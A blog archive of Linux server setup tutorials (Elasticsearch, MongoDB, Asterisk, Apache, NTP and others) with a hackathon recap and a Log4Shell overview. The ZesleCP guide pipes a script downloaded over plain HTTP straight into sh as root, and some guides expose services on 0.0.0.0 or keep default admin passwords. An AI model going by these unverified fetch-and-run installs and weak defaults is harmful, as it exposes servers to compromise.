Elastic Search Cluster on Ubuntu 14.04

Featured

Elastic Search is a popular open source search server that is used for real-time distributed search and analysis of data. When used for anything other than development, Elastic Search should be deployed across multiple servers as a cluster, for the best performance, stability, and scalability.

elasticsearch_logo

Demonstration:

OMegha Platform.

Image – Ubuntu-14.04

Prerequisites:

You must have at least three Ubuntu 14.04 servers to complete this, because an Elastic Search cluster should have a minimum of 3 master-eligible nodes. If you want to have dedicated master and data nodes, you will need at least 3 servers for your master nodes plus additional servers for your data nodes.

Install Java 8:

Elastic Search requires Java, so we will install that now. We will install a recent version of Oracle Java 8 because that is what Elastic Search recommends. It should, however, work fine with OpenJDK, if you decide to go that route.

Complete this step on all of your Elastic Search servers.

Add the Oracle Java PPA to apt:

$ sudo add-apt-repository -y ppa:webupd8team/java

Update your apt package database:

$ sudo apt-get update

Install the latest stable version of Oracle Java 8 with this command (and accept the license agreement that pops up):

$ sudo apt-get -y install oracle-java8-installer

Be sure to repeat this step on all of your Elastic Search servers.

Now that Java 8 is installed, let’s install Elastic Search.

Install Elastic Search:

Elastic Search can be downloaded directly from elastic.co in zip, tar.gz, deb, or rpm packages. For Ubuntu, it’s best to use the deb (Debian) package which will install everything you need to run Elastic Search.

$ wget https://download.elastic.co/elasticsearch/elasticsearch/elasticsearch-1.7.2.deb

Then install it in the usual Ubuntu way with the dpkg command like this:

$ sudo dpkg -i elasticsearch-1.7.2.deb

This results in Elastic Search being installed in /usr/share/elastic Search/ with its configuration files placed in /etc/elastic Search and its init script added in /etc/init.d/elastic search.

$ sudo update-rc.d elasticsearch defaults

Be sure to repeat these steps on all of your Elastic Search servers.

Elastic Search is now installed but it needs to be configured before you can use it.

Configure Elastic search Cluster

Now it’s time to edit the Elastic search configuration. Complete these steps on all of your Elastic search servers.

Open the Elastic search configuration file for editing:

$ sudo vi /etc/elasticsearch/elasticsearch.yml

Set Cluster Name:

Next, set the name of your cluster, which will allow your Elastic search nodes to join and form the cluster. You will want to use a descriptive name that is unique (within your network).

Find the line that specifies cluster.name, uncomment it, and replace its value with the your desired cluster name. In this tutorial, we will name our cluster “elastic search_cluster”:

ELK1

Set Node Name:

Next, we will set the name of each node. This should be a descriptive name that is unique within the cluster.

Find the line that specifies node.name, uncomment it, and replace its value with your desired node name. In this tutorial, we will set each node name to the host name of server by using the ${HOSTNAME}environment variable:

ELK2

For Master Node:

For Master set the node.master as True and for node.data as False

ELK3

For Data Node:

For Data set the node.master as False and for node.data as True

ELK4

Network Host:

Set the network host as 0.0.0.0

ELK5

Set Discovery Hosts:

Next, you will need to configure an initial list of nodes that will be contacted to discover and form a cluster. This is necessary in a unicast network.

Find the line that specifies discovery.zen.ping.unicast.hosts and uncomment it.

For example, if you have three servers node01, node02, and node03 with respective VPN IP addresses of 10.0.0.1, 10.0.0.2, and 10.0.0.3, you could use this line:

ELK6

Save and Exit.

Your servers are now configured to form a basic Elastic search cluster. There are more settings that you will want to update, but we’ll get to those after we verify that the cluster is working.

Save and exit elasticsearch.yml.

Start Elastic search:

Now start Elastic search:

$ sudo service elasticsearch restart

Then run this command to start Elastic search on boot up:

$ sudo update-rc.d elasticsearch defaults 95 10

Be sure to repeat these steps (Configure Elastic search) on all of your Elastic search servers.

Testing:

By now, Elastic search should be running on port 9200. You can test it with curl, the command line client-side URL transfers tool and a simple GET request like this:

$ curl -X GET 'http://localhost:9200'

You should see the following response:

ELK7

If you see a response similar to the one above, Elastic search is working properly. If not, make sure that you have followed correctly the installation instructions and you have allowed some time for Elastic search to fully start.

Check Cluster State:

If everything was configured correctly, your Elastic search cluster should be up and running. Before moving on, let’s verify that it’s working properly. You can do so by querying Elastic search from any of the Elastic search nodes.

From any of your Elastic search servers, run this command to print the state of the cluster:

$ curl -XGET 'http://localhost:9200/_cluster/state?pretty'

EL8

If you see output that is similar to this, your Elastic search cluster is running! If any of your nodes are missing, review the configuration for the node(s) in question before moving on.

Next, we’ll go over some configuration settings that you should consider for your Elastic search cluster.

Enable Memory Locking:

Elastic recommends to avoid swapping the Elastic search process at all costs, due to its negative effects on performance and stability. One way avoid excessive swapping is to configure Elastic search to lock the memory that it needs.

Complete this step on all of your Elastic search servers.

Edit the Elastic search configuration:

$ sudo vi /etc/elasticsearch/elasticsearch.yml

Find the line that specifies bootstrap.mlockall and uncomment it:

ELK9

Save and exit.

Now restart Elastic search to put the changes into place:

$ sudo service elasticsearch restart

Cluster Health:

This API can be used to see general info on the cluster and gauge its health:

$ curl -XGET 'localhost:9200/_cluster/health?pretty'

ELK10

Cluster State:

This API can be sued to see a detailed status report on your entire cluster. You can filter results by specifying parameters in the call URL.

$ curl -XGET 'localhost:9200/_cluster/state?pretty'

ELK11

Conclusion:

Your Elastic search cluster should be running in a healthy state, and configured with some basic optimizations.

 

Advertisement

Node.js Installation

Featured

Node.js is a cross-platform environment and library for running JavaScript applications which are used to create networking and server-side applications.

It is used to develop I/O intensive web applications like video streaming sites, single-page applications, and other web applications.

Prerequisites

To follow this blog, you will need:

  • One Ubuntu 16.04 server set up by following this initial server setup, including a sudo non-root user.

Node.js Installation In Ubuntu 16.04

Step-1 Update the Package List

Before installing the node.js on to the Ubuntu system, update all available repositories.

sudo apt-get update

Step-2  Install Node.js

Run below command to install standard package of node.js

sudo apt-get install nodejs

Step-3 Install NPM

For installing Node.js the npm package is also required. By using below command we install the npm package.

sudo apt-get install npm

In order for some npm packages to work (those that require compiling code from source, for example), you will need to install the build-essential package:

sudo apt-get install build-essential

Installation Check

After Installing the node.js and npm we check that installation is correct or not by typing the following commands:

Node.js Installation Check

nodejs --version

NPM Installation Check

npm --version

Remove Node.js

For removing the node.js from ubuntu system completely we type following commands:

Remove Package without Configuration Files

This command removes node.js but configuration files remain so next time we install node.js than it will be used.

sudo apt-get remove nodejs

Remove Package with Configuration Files

If you don’t want to kept the configuration files then use following command.

sudo apt-get purge nodejs

Finally, Remove Unused Packages

For removing the unused packages that are installed with node.js run the following command:

sudo apt-get autoremove 

Installing Open Source Hosting Control Panel (ZesleCP) on Ubuntu 16.04

Featured

Zesle Control Panel

Secure Web Control Panel for your needs…

ZCP

Zesle is one of the popular open source control panel that any own can download and install. This is very simple and can be installed in just one command.

System Requirements:

  • Ubuntu 14/16
  • 1Ghz CPU
  • 512MB RAM
  • 10+GB DISK

Zesle is simpler and very User friendly.  Using Zesle you’ll be able to do the below tasks…

  • Add multiple domains without hassle;
  • Add multiple sub domains;
  • Install WordPress easily with one-click app;
  • Install free Let’s Encrypt SSL certificates with ease;
  • Configure basic PHP settings;
  • Manage Email accounts;
  • Access phpMyAdmin.

and much more. Let’s see how to install Zesle in your hosting.

Step 1: It’s super-easy to install Zesle. Run the following command with Root privilege.

$ cd /home && curl -o latest -L http://zeslecp.com/release/latest && sh latest

Step 2: The installation will begin and in between It will ask the admin’s email address. Please provide your email id and click enter.

Step 3: You will see the below screen at the end of the installation.

zcsp1.png

Step 4: This is how Zesle will looks like. Once the installation is completed, it’ll show you the temporary password and the login URL.

Step 5: The login URL will be your IP address followed by the port number(2087 will be the default one). For example: https://11.11.11.111:2087 is a sample URL.

Step 6: Just enter this in your browser and you’ll get the login screen.

zcsp2

Step 7: Use root as your username

Step 8: Copy paste the temporary root password provided. Once you entered the correct password, the control panel will open and here is how it looks like. All the options mentioned above will be available in the left side of the UI.

zcsp3

Step 9: In the Dashboard, you can create your account, and install WordPress on your domain using “Once Click Apps

Step 10: There is installation steps end for free Linux Web Hosting control panel called ZesleCP.

 

Installation of Open Project Management System on Ubuntu 16.04

Featured

OpenProjectLogo

Open Project is a web-based management system for location-independent team
collaboration, released under GNU GPL 3 License. It’s a project management software
that provides task-management, team collaboration, scrum etc. Open Project is written
in Ruby on Rails and AngularJS. In this tutorial, I will show you how to install and
configure the Open Project management system using Ubuntu 16.04. The tool can be
installed manually or by using packages from the repository. For t his guide, we will
install Open Project from repository.

Prerequisites

  •  Ubuntu 16.04.
  •  Good Internet Connectivity.
  •  Root Privileges.

What we will do

  • Update and Upgrade System.
  • Install Open Project Management System.
  • Configure the Open Project System.
  • Testing.

Step 1: Update and Upgrade System

Before installing the Open Project on to the Ubuntu system, update all available repositories and upgrade the Ubuntu system.

Run the following commands.

$ sudo apt update
$ sudo apt upgrade -y

Step 2: Install Open Project Management System

Download the open project key and add it to the system.

$ sudo wget -qO- https://dl.packager.io/srv/opf/openproject-ce/key | sudo apt-key add

And download the open project repository for Ubuntu 16.04 in the ‘/etc/apt/sources.list.d’ directory.

$ sudo wget -O /etc/apt/sources.list.d/openproject-ce.list \
  https://dl.packager.io/srv/opf/openproject-ce/stable/7/installer/ubuntu/16.04.repo

Now update the Ubuntu repository and install open project using the apt command as shown below.

$ sudo apt update
$ sudo apt-get install openproject -y

Step 3: Configure the Open Project System

Run the Open Project configuration command. A Graphical based UI screen will appear.

$  sudo openproject configure

op1

Select ‘Install and configure MySQL server locally’ and click ‘OK’. It will automatically install MySQL server on the system, and automatically create the database for openproject installation.

For the web server configuration, choose the ‘Install apache2 server’ and click ‘OK’. it will automatically install the apache2 web server and configure the virtual host for Open Project application.

op2

Now type the domain name for your Open project application, and choose ‘OK’.

Next, for the SSL configuration. If you have purchased SSL certificates, choose ‘yes’, and ‘no’ if you don’t have SSL certificates.

op3

Skip the subversion support, GitHub support and SMTP configuration. (if not needed).

And for memcached installation choose ‘Install’ and select ‘OK’ for better performance of Open Project.

op4

Finally, installation and configuration of all the packages required for Open Project installation should happen automatically.

Step 4: Testing

Check whether the Open Project service is up and running.

$  sudo service openproject status

Now run the openproject web service using the following command.

$  sudo openproject run web

Now open your web browser and type on the address bar your floating IP to access the system

op5

Now click the ‘Sign in’ button to log in to the admin dashboard initially using ‘admin’ as user and ‘admin’ as password and later you can change it.

Finally, the installation and configuration for Open Project on Ubuntu 16.04 has been completed successfully.

 

 

 

Apache Virtual Hosts on Ubuntu 14.04

Featured

The Apache web server is the most popular way of serving web content on the internet. It accounts for more than half of all active websites on the internet and is extremely powerful and flexible.

Apache breaks its functionality and components into individual units that can be customized and configured independently. The basic unit that describes an individual site or domain is called a Virtual Host.

virtual-hosting-apache

These designations allow the administrator to use one server to host multiple domains or sites off of a single interface or IP by using a matching mechanism. This is relevant to anyone looking to host more than one site off of a single VPS.

In this document, we will walk you through how to set up Apache virtual hosts on an Ubuntu 14.04 VPS. During this process, you’ll learn how to serve different content to different visitors depending on which domains they are requesting.

Prerequisites

  • Before you begin this tutorial, you should create a non root user.
  • You will also need to have Apache installed in order to work through these steps.

Demonstration:

OMegha platform.

Image – Ubuntu-14.04

Lets get Started,

At first we need to update the packages list.

$ sudo apt-get update

VH1

Install Apache

$ sudo apt-get install apache2

VH2

For the purposes of this document, my configuration will make a virtual host for infra.com and another for infra1.com

Step 1: Create the Directory Structure

Our document root will be set to individual directories under the /var/www directory. We will create a directory here for both of the virtual hosts we plan on making.

Within each of these directories, we will create a public_html folder that will hold our actual files. This gives us some flexibility in our hosting.

$ sudo mkdir -p /var/www/infra.com/public_html

$ sudo mkdir -p /var/www/infra1.com/public_html

The portions in red represent the domain names that we are wanting to serve from our VPS.

Step 2: Grant Permissions

Changing the Ownership

$ sudo chown -R $USER:$USER /var/www/infra.com/public_html

$ sudo chown -R $USER:$USER /var/www/infra1.com/public_html

VH3

We should also modify our permissions a little bit to ensure that read access is permitted to the general web directory and all of the files and folders

$ sudo chmod -R 755 /var/www

Step 3: Create Demo Pages for Each Virtual Host

We have to create index.html file for each site.

Let’s start with infra.com. We can open up an index.html file in our editor by typing

$ sudo vi /var/www/infra.com/public_html/index.html

In this file, create a simple HTML document that indicates the site it is connected to and My file looks like this

<html>

  <head>

    <title>Welcome to infra.com!</title>

  </head>

  <body>

    <h1>Success!  The infra.com virtual host is working!</h1>

  </body>

</html>

Save and close the file when you are finished.

We can copy this file to use as the basis for our second site by typing

cp /var/www/infra.com/public_html/index.html /var/www/infra1.com/public_html/index.html

Then we can open the file and modify the relevant pieces of information

$ sudo vi /var/www/infra1.com/public_html/index.html

<html>

  <head>

    <title>Welcome to infra1.com!</title>

  </head>

  <body>

    <h1>Success!  The infra1.com virtual host is working!</h1>

  </body>

</html>

Save and close the file.

Step 4: Create New Virtual Host Files

Virtual host files are the files that specify the actual configuration of our virtual hosts and dictate how the Apache web server will respond to various domain requests.

Apache comes with a default virtual host file called 000-default.conf and we can
copy that to our first domain of the virtual host file.

Creating First Virtual Host File

Start by copying the file for the first domain

$ sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/infra.com.conf

Open the new file in your editor with root privileges

$ sudo vi /etc/apache2/sites-available/infra.com.conf

our virtual host file should look like this

<VirtualHost *:80>

    ServerAdmin admin@infra.com

    ServerName infra.com

    ServerAlias www.infra.com

    DocumentRoot /var/www/infra.com/public_html

    ErrorLog ${APACHE_LOG_DIR}/error.log

    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Save and close the file.

Copy first Virtual Host and Customize for Second Domain

Now that we have our first virtual host file established, we can create our second one by copying that file and adjusting it as needed.

Start by copying

$ sudo cp /etc/apache2/sites-available/infra.com.conf /etc/apache2/sites-available/infra1.com.conf

Open the new file with root privileges

$ sudo vi /etc/apache2/sites-available/infra1.com.conf

You now need to modify all of the pieces of information to reference your second domain. When you are finished, it may look something like this

<VirtualHost *:80>

    ServerAdmin admin@infra1.com

    ServerName infra1.com

    ServerAlias www.infra1.com

    DocumentRoot /var/www/infra1.com/public_html

    ErrorLog ${APACHE_LOG_DIR}/error.log

    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Save and close the file.

Step 5: Enable the New Virtual Host Files

Created Virtual host files needs to be enabled.

We can use the a2ensite tool to enable each of our sites

$ sudo a2ensite infra.com.conf

$ sudo a2ensite infra1.com.conf

VH4

Restart the apache server.

$ sudo service apache2 restart

Step 6: Setup Local Hosts File

$ sudo vi /etc/hosts

The details that you need to add are the public IP address of your VPS server followed by the domain you want to use to reach that VPS.

127.0.0.1 localhost

***.***.***.*** infra.com

***.***.***.*** infra1.com

Save and close the file.

This will direct any requests for infra.com and infra1.com on our computer and send them to our server at ***.***.***

Step 7: Test Your Results

Now that you have your virtual hosts configured, you can test your setup easily by going to the domains that you configured in your web browser

http://infra.com

VH5

You should see a page that looks like this

Likewise, if you can visit your second page

http://infra1.com

VH6

You will see the file you created for your second site

Step 8: Conclusion

If both of these sites work well, you’ve successfully configured two virtual hosts on the same server.

If you need to access this long term, consider purchasing a domain name for each site you need and setting it up to point to your VPS server.

Centralize Logs from Node.js Applications

Featured

Prerequisites

  • Installation of Node.js and NPM
  • Installation of Fluentd

Modifying the Config File

Next, please configure Fluentd to use the forward Input plugin as its data source.

$ sudo vi /etc/td-agent/td-agent.conf

Fluent daemon should listen on TCP port.

Simple configuration is following:

1

Restart your agent once these lines are in place.

$ sudo service td-agent restart

fluent-logger-node

Install fluent-logger-node

$ npm install fluent-logger

Now use npm to install your dependencies locally:

$ npm install

Send an event record to Fluentd

index.js

This is the simplest web app.

2

Run the app and go to http://localhost:4000 in your browser. This will send the logs to Fluentd.

$ node index.js

3

The logs should be output to /var/log/td-agent/td-agent.log  

Store Logs into MongoDB

Fluentd does 3 things:

  1. It continuously “tails” the access log file.
  2. It parses the incoming log entries into meaningful fields (such as ip,path, etc.) and buffers them.
  3. It writes the buffered data to MongoDB periodically.

Configuration         

Fluentd’s config file

$ sudo vi /etc/td-agent/td-agent.conf

 The Fluentd configuration file should look like this:

4

Restart your agent once these lines are in place.

$ sudo service td-agent restart

Then, access MongoDB and see the stored data.

$ mongo

5

Fluentd + MongoDB makes real-time log collection simple, easy, and robust.

Installation of MongoDB on Ubuntu 16.04

Featured

MongoDB is a free and open-source NoSQL document database used commonly in modern web applications.

mongodb

MongoDB is one of several database types to arise in the mid-2000s under the NoSQL banner. Instead of using tables and rows as in relational databases, MongoDB is built on an architecture of collections and documents. Documents comprise sets of key-value pairs and are the basic unit of data in MongoDB. Collections contain sets of documents and function as the equivalent of relational database tables.

Like other NoSQL databases, MongoDB supports dynamic schema design, allowing the documents in a collection to have different fields and structures. The database uses a document storage and data interchange format called BSON, which provides a binary representation of JSON-like documents. Automatic sharding enables data in a collection to be distributed across multiple systems for horizontal scalability as data volumes increase.

This blog will help you set up MongoDB on your server for a production application environment.

Prerequisites

To follow this blog, you will need:

  • One Ubuntu 16.04 server set up by following this initial server setup, including a sudo non-root user.

Adding the MongoDB Repository

MongoDB is already included in Ubuntu package repositories, but the official MongoDB repository provides most up-to-date version and is the recommended way of installing the software. In this step, we will add this official repository to our server.

Ubuntu ensures the authenticity of software packages by verifying that they are signed with GPG keys, so we first have to import they key for the official MongoDB repository.

$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv EA31292

After successfully importing the key, you will see:

gpg: Total number processed: 1
gpg:        imported: 1    (RSA:  1)

Next, we have to add the MongoDB repository details so apt will know where to download the packages from.

Issue the following command to create a list file for MongoDB.

$ echo "deb http://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/3.2 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.2.list

After adding the repository details, we need to update the packages list.

$ sudo apt-get update

Installing and Verifying MongoDB

Now we can install the MongoDB package itself.

$ sudo apt-get install -y mongodb-org

This command will install several packages containing latest stable version of MongoDB along with helpful management tools for the MongoDB server.

Next, start MongoDB with systemctl.

$ sudo systemctl start mongod

You can also use systemctl to check that the service has started properly.

$ sudo systemctl status mongod
$ mongo

mongodb.service - High-performance, schema-free document-oriented database
Loaded: loaded (/etc/systemd/system/mongodb.service; enabled; vendor preset: enabled)
Main PID: 4093 (mongod)
Tasks: 16 (limit: 512)
Memory: 47.1M
CPU: 1.224s
CGroup: /system.slice/mongodb.service
└─4093 /usr/bin/mongod --quiet --config /etc/mongod.conf

The last step is to enable automatically starting MongoDB when the system starts.

$ sudo systemctl enable mongod

The MongoDB server is now configured and running, and you can manage the MongoDB service using the systemctl command (e.g. sudo systemctl stop mongod, sudo systemctl start mongod).

Installing Asterisk on Ubuntu 16.04

Featured

Tags

,

Asterisk is a software implementation of a telephone private branch exchange (PBX). It allows telephones interfaced with a variety of hardware technologies to make calls to one another, and to connect to telephony services, such as the public switched telephone network (PSTN) and voice over Internet Protocol (VoIP) services. Its name comes from the asterisk symbol “*”.

Asterisk_Logo.svg

Some of the many features of Asterisk include:

  • The Asterisk software includes many features available in commercial and proprietary PBX systems: voice mailconference callinginteractive voice response and automatic call distribution.
  • Users can create new functionality by writing dial plan scripts in several of Asterisk’s own extensionslanguages, by adding custom loadable modules written in C, or by implementing Asterisk Gateway Interface (AGI) programs using any programming language capable of communicating via the standard streams system (stdin and stdout) or by network TCP sockets.
  • Asterisk supports several standard voice over IPprotocols, including the Session Initiation Protocol (SIP), the Media Gateway Control Protocol (MGCP), and 323.
  • Asterisk supports most SIP telephones, acting both as registrar and back-to-back user agent.
  • By supporting a variety of traditional and VoIP telephony services, Asterisk allows deployers to build telephone systems, or migrate existing systems to new technologies.

asterisk arc

 Install Asterisk from Source

After logging in to your Ubuntu Server as an user, issue the following command to switch to root user.

$ sudo su 

Now you are root, but you need to set the password with the following command.

# passwd

Next step would be to install initial dependencies for asterisk.

# apt-get install build-essential wget libssl-dev libncurses5-dev libnewt-dev libxml2-dev linux-headers-$(uname -r) libsqlite3-dev uuid-dev git subversion

Installing Asterisk

Now when we are root and dependencies are satisfied, we can move to /usr/src/ directory and download latest asterisk version there.

# cd /usr/src
# wget http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-15-current.tar.gz

Next we unpack it.

# tar zxvf asterisk-15-current.tar.gz

Now we need to enter into the newly unpacked directory,

# cd asterisk-15*

Before we actually compile the asterisk code, we need ‘pjproject’ as asterisk-15 introduces the support for pjsip. So we will compile it first:

# git clone git://github.com/asterisk/pjproject pjproject
# cd pjproject
# ./configure --prefix=/usr --enable-shared --disable-sound --disable-resample --disable-video --disable-opencore-amr CFLAGS='-O2 -DNDEBUG'
# make dep
# make && make install
# ldconfig
# ldconfig -p |grep pj

Configuring Asterisk

And now we commence to configuring and compiling the Asterisk code.

# cd ..
# contrib/scripts/get_mp3_source.sh
# contrib/scripts/install_prereq install

This will install mp3 tones and satisfy additional dependencies which might take some time and ask you for your country code. Following command will compile and install asterisk.

# ./configure && make menuselect && make && make install

When that is finished, to avoid making hundred of config files yourself, after install you normally want to run this command, which will make initial config for you:

# make samples

And for having the start up script installed and enabled to start asterisk on every boot, we run make config, followed by ldconfig:

# make config
# ldconfig

Now we can start asterisk for the first time and see if it actually works.

# /etc/init.d/asterisk start

and then we can enter asterisk console with command.

# asterisk -rvvv

Now we need to do additional steps to make it run as asterisk user. First we need to stop asterisk.

# systemctl stop asterisk

Then we need to add group and user named asterisk.

# groupadd asterisk
# useradd -d /var/lib/asterisk -g asterisk asterisk

Asterisk needs to be configured to start as the user we just created, we can edit /etc/default/asterisk by hand but it is more efficient to use following two sed commands.

# sed -i 's/#AST_USER="asterisk"/AST_USER="asterisk"/g' /etc/default/asterisk
# sed -i 's/#AST_GROUP="asterisk"/AST_GROUP="asterisk"/g' /etc/default/asterisk

To run properly, asterisk user needs to be assigned ownership to all essential asterisk directories.

# chown -R asterisk:asterisk /var/spool/asterisk /var/run/asterisk /etc/asterisk /var/{lib,log,spool}/asterisk /usr/lib/asterisk

The asterisk.conf also needs to be edited to uncoment lines for runuser and rungroup:

# sed -i 's/;runuser = asterisk/runuser = asterisk/g' /etc/asterisk/asterisk.conf
# sed -i 's/;rungroup = asterisk/rungroup = asterisk/g' /etc/asterisk/asterisk.conf

when this is done, reboot the server so Asterisk brings up automatically by systemd, and then type asterisk -rvvv to enter the asterisk console.

# asterisk -rvvv

 

HACKSTACK 1.0

Tags

, , , , , , , , ,

In the month of July 2022 within the office walls of Infrastack-Labs, discussions for conducting a Hackathon were brewing. A plan for a themed Hackathon focused on Industry 4.0 technologies was conceived. Big-Data, Cyber security, IoT, and Cloud computing all will take centre stage in this 24-hour hackathon.

 InfraStack-Labs is a technology-driven company that has always strived to be a forerunner in the industry, with the company ethos of innovation InfraStack-Labs set out to create a 24-hour hackathon that would become the torchbearer for innovation and serve as a platform to galvanize the minds of the youth of our country.

This Hackathon was envisaged as a highly collaborative event where students from all across the country would come together as teams and work on projects to solve real-world problems. A plan for a thrilling and fun 24 hours was drawn up by the team at InfraStack-Labs Which was named Hackstack.

The registrations began on July 17th and were closed on 5th August 2022. The response from students was overwhelmingly positive. Colleges from all over India registered for Hackstack1.0. These teams submitted innovative and groundbreaking ideas which through an extensive round of scrutiny were shortlisted leaving us with the top 12 teams who would participate in the 24 hours of Hackstack1.0

The event kicked off at 8:30 AM on the 19th of August with teams registering at the venue which was followed by a quick breakfast. Once the teams were settled in we began the introduction session where our CTO Mr. Ajith Narayanan explained the idea behind the Hackathon and also proceeded to welcome everyone.

At 11:30 AM the timer started, signaling the start of the build. At this point, teams started to put their thinking caps on and get to work. One could feel the intensity in the room as the promising engineers started making sketches and laying out plans. Our team who have been on site and facilitating everyone got a chance to interact with the students. We were all amazed by the sheer caliber of the participants.

While the build progressed, lunch was served at 2:00 PM giving most teams time to clear their minds and get some fresh air before heading back into the high-octane environment that Hackstack 1.0 was turning out to be. As the evening approached, we could see what many projects coming into shape. Once empty work desks now were full of amazing tech.

We had an enclosed turf on the premises where teams could blow off some steam, “all work and no play makes Tommy a dull boy”. After tea at 5:00 PM, a trivia quiz was conducted. It was very entertaining with quippy answers and electrifying enthusiasm. Winners of the Quiz received top-of-the-line smartwatches as prizes.

Teams resumed work on their projects, and they were on track, meeting the goals they had set for themselves but all that was just about to change. The judges started arriving and started interacting with the teams. The judges spent a considerable amount of time with the participants, going through each and every detail of their project. Teams used the feedback from the judges to optimize their projects.

All this pressure was enough to drum up an appetite. A sumptuous dinner was served at 9:00 PM which definitely lifted spirits and amped up everyone for the remainder of the night. At 1:00 AM a game of Pictionary was organized, it turned out to be like an episode straight out of the ‘Big Bang theory. By 3:00 AM you could see the sleep-deprived souls still hard at work fixing bugs and testing out their projects. As the day dawned and the timer approached zero time one could see the faces light back up as excitement crept back in. A countdown followed by a round of cheers and applause at 7:30 AM marked the end of the build.

The final stage was the presentations, each team would pitch their project for 10 minutes and interact with the judges. Afterward, the judges deliberated for a while before listing out the winners. 24 hours has boiled down to this moment the participants all with their fingers crossed listened as the results were announced.

Team “Name doesnt matter” was chosen as the 2nd runner up

Team Alpha from KPR Institute of Engineering and Technology was chosen 1st runner up

Team A2Z Tech Valley from Sri Krishna college of Engineering and technology was chosen as the winners

Hackstack 1.0 was a massive hit with the participants, the feedback from the participants described the event as “perfect”, most expressed their desire to come back next year, and surely Hackstack will be bigger and better to welcome them!

Watch the full video here : –HackStack v1.0 – An Industry 4.0 themed 24 hrs Hackathon

Scope of Big Data Applications

Tags

, , ,

Scope of Big Data Applications

Every day, we produce 2.5 quintillion bytes of data, so much that 90% of the data in the world today has been created in the last two years alone. The data which comes from different sources are converted into useful information’s by using big data analytics. These large amount of data that is being produced continuously is what can be coined as Big Data. Big Data Analytics open up extensive kind of openings in several fields.

Big Data Analysis substantially involves logical styles of big data, methodical armature of big data, and big data mining and software for analysis. Data accession is the most important step in big data, for exploring meaningful values, giving suggestions and opinions. Possible values can be explored by data analysis. And also these collected data’s should be useful for the analysis.

In olden days companies used to advertise their product for marketing. But in that there is no much targeted approach . But now a days companies are substantially used digital marketing for their product’s promotion. In digital marketing with the help of these big data operations it’s easy to target the right leads for the business.

APPLICATIONS OF BIG DATA

  • Market the product to right audience
  • Fraud Detection and risk management
  • Supply chain Management
  • Direct Innovation and product development

Challenges in Big Data Applications

In Big data projects, the foremost important thing is the data itself. With these data, only organizations are making their predictive models for their unborn systems. So If we miss any data while collecting from all scenarios it may beget a massive negative impact on decision making. That is if we missed any data while collecting data or if we get any wrong input while data analysis we will be getting wrong predictive models and it may cause us of making wrong decisions. This is one of the main challenges faced in big data analysis. Big data is a significant area which offers numerous benefits and innovations. It’s a
remarkable sphere with a promising future, if approached rightly. The difficulty with big data
comes substantially from its size, which requires proper storehouse, operation, integration, sanctification,
processing, and analysis.

Characteristics of Big Data

Types of Big Data

Types of Big Data

Installing Monitorix -OpenSource Lightweight System Monitoring tool

Tags

, ,

What is Monitorix ?

Monitorix is an open-source lightweight system monitoring tool used for Linux operating systems. Monitorix is used in the production environment.It also is a network monitoring tool that collects the system data and shows it the web interface through graphs.

Monitorix consists of the following graphs

Global kernel/Per-processor kernel usage

System load average and usage

Filesystem usage and I/O activity

Process statistics

Network traffic and usage

Netstat statistics

Network port traffic

Before Installing Monitorix ,Setup EPEL repository if not installed.

yum -y install epel-release
yum -y install monitorix

We need to start the monitorix service.

service monitorix start

We can check the status of monitorix by the following command

service monitorix status

We need to allow the firewall port no 8080, then only we can access the Monitorix dashboards from external dashboards.

Access Monitorix

Open it through the browser http://your-ip-add-ress:8080

NTP servers and how to setup your own

Tags

, , ,

What is NTP?

NTP stands for Network Time Protocol, It is one of the oldest protocols still in use. This is a networking protocol used for clock synchronization among computer systems. This has been around since the 1980’s David L. Mills A professor from the university of Delaware is credited as the man who designed the NTP.

The NTP is most commonly associated with the client-server model where the computers in a network are synchronized to within few milliseconds of coordinated universal time, commonly referred as UTC. Synchronizing time is one of the fundamentals of any network and hence the NTP is a quintessential component in the modern computing world. Currently NTP is at its 4th version (NTPv4).

To better understand how NTP works here’s a guide to set up your own NTP host and clients.


Setup

In this project we will be setting up a host and a client to which it will connect to.

In this case we are using UBUNTU 18.04 LTS VMs for setup.

Stage 1 : setting up your Host Server

Step 1

Update the repository

$ sudo apt-get update

Step 2

Install NTP server with apt-get

$ sudo apt-get install ntp

Verify the installation

$ sntp --version

Step 3

Open the configuration file and add the time server pools

$ sudo nano /etc/ntp.conf

We need to change the highlighted portion which is the time pools list

In this case im choosing India zone
www.pool.ntp.org visit this website for time pools

Step 4

Copy the pools and add it to the config file like so

Quit using CTRL X followed by y for saving

Step 5

Restart the NTP server

$ sudo service ntp restart

Then check NTP status

$ sudo service ntp status

Step 6
Configure firewall to allow clients to connect

$ sudo ufw allow from any to any port 123 proto udp

Stage 2 : Set up the client

Step 7

Install ntpdate on client

The ntpdate command will let you manually check your connection configuration with the NTP-server.

$ sudo apt-get install ntpdate

Step 8

Specify the ip and the host name in the client config file

$ sudo nano /etc/hosts

Step 9

Check if client time is synchronized with host

$ sudo ntpdate NTP-server-host

Step 10

Disable Systemd timesyncd service on client

Cos we need our client to sync with our NTP host

$ sudo timedatectl set-ntp off

Step 11

Install NTP on the client

$ sudo apt-get install ntp

Step 12

Configure ntp.conf

$ sudo nano /etc/ntp.conf

Add server ntphost prefer iburst at the end of conf file

Step 13

Restart the NTP service

$ sudo service ntp restart

Step 14

$ ntpstat

Host vs Client

We can see that the Host and client are in sync

Impact of Apache Log4j (Log4shell) Vulnerability

Tags

,

What is Apache Log4j?

Log4j is an open-source project managed by the Apache Software Foundation. Apache Log4j is a Java-based logging utility. Log4j Java library’s role is to log information that helps applications run smoothly, determine what’s happening, and help with the debugging process when errors occur.

What is Log4shell and How it Affected?

Log4Shell is a severe critical vulnerability affecting many versions of the Apache Log4j application. The vulnerability allows unauthenticated remote code execution. Log4Shell means that attackers can remotely run whatever code they want and gain access to all data on the affected machine. It also allows them to delete or encrypt all files on the affected machine and store them for a ransom demand. This potentially makes it a target for anything that uses a vulnerable version of Log4j to log user-controllable data. According to the Indian Computer Emergency Response Team (CERT), multiple vulnerabilities are reported in Apache Log4j, which can be exploited by an overseas attacker to execute arbitrary code or perform denial of service attack on the targeted servers. Approximately 3 Billion devices runs Java so at the identical time Log4j are often found in many devices and applications that priorities this issue high. And also this vulnerability is found in products of  famous technology vendors like AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMware.

